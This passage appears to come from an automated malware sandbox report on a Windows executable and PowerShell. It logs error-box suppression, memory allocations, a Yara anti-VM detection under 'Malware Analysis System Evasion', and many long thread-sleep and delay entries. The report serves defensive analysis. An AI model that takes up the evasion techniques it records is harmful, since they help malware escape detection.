                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: D60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 76B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 6DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 86B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 96B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 9BB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: ABB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: BBB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599762Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597905Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597577Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597358Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596047Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595827Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 594952Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeWindow / User API: threadDelayed 5114Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeWindow / User API: threadDelayed 4875Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6764Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2916Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeWindow / User API: threadDelayed 2320Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeWindow / User API: threadDelayed 7539Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeWindow / User API: foregroundWindowGot 1727Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 5660Thread sleep count: 2320 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 5660Thread sleep count: 7539 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599762s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597905s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597577s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597358s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -596047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595827s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -595062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -594952s >= -30000sJump to behavior
